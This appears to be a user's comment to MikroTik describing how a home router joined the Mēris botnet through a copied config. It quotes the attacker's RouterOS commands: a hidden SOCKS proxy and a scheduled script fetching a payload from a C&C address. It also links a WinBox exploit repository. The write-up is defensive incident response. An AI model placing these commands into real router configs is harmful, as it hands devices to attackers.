I recently helped my friend Ritvars clean up his MikroTik router (a hAP AC running the latest 6.48.4 stable). We would like to note that this router’s factory firmware was v6.44.6 and as such the router had never
run a vulnerable RouterOS version.
So how did it become part of Mēris? Simple: my friend previously had an older MikroTik that had WinBox open to the entire world and that older router got compromised at some point in the past. When he replaced this old router he also copied over the old config including changes that Mēris had made. Ooops! Something to check for in your own deployments.
About the indicators of compromise -- they were the same as mentioned above but let us add a bit more detail.
First: SOCKS proxy was enabled, running on a non-standard port
. SOCKS uses TCP port 1080 by default and comes disabled. You would definitely know if you had it enabled as it is a very atypical config. Moreover, the SOCKS access list had a single entry with IP range we did not recognize:
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!184.108.40.206/25
At this point the router’s CPU was pegged at 50% and we saw ~200 open SOCKS connections pushing whatever malicious traffic. As we disabled SOCKS proxy the CPU usage promptly dropped to 2%.
Second: router had a scheduled task executing an unknown script
. Again, in its default config RouterOS has no scripts and no scheduled tasks defined. Ours looked as follows:
add interval=30s name=schedule4_ on-event=script4_ policy=\
add dont-require-permissions=no name=script4_ owner=Ritvars policy=\
ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
ddress=220.127.116.11 port=2008 src-path=/mikrotik.php mode=http keep-resu\
Notice that the IP belongs to the same C&C range mentioned above. So we deleted the script and deleted the scheduled task. We did not observe any L2TP changes: the L2TP config was blank, as is the default.
Please note that the same WinBox exploit which presumably was used to gain the initial compromise would also have allowed the attacker to recover all user passwords in plain text (including passwords for deleted users). See details at https://github.com/BigNerd95/WinboxExploit
. Therefore you should rotate your passwords in RouterOS and everywhere else you have reused the same. I'd suggest you also make sure to restrict your router management access (e.g. ssh, WinBox) to a minimal subset of networks (ideally: networks you physically control like your LAN). Don’t have them wide open to the entire internet.
Speaking of the latter point: keeping up to date IP lists is harder than it needs to be. For example, MikroTik script limits file access to 4 kilobytes
, and while there is a workaround to load IP lists up to 63K
, it leaves little room for growth if your IP lists have comments. Is there a better way coming in new RouterOS? :) Moreover, unless I want to manually upgrade RouterOS CA certificates, I have to run
as the latest stable RouterOS does not recognize LetsEncrypt. Could you make sure that RouterOS database is in sync with, say, Mozilla’s
? Here is how Debian maintains their copy: https://salsa.debian.org/debian/ca-certificates
Finally, thank you for all your hard work. We are very happy users of MikroTik and are very much looking forward to the new 7.x branch hitting stable. WireGuard, ZeroTier, rock solid hardware - what's not to love.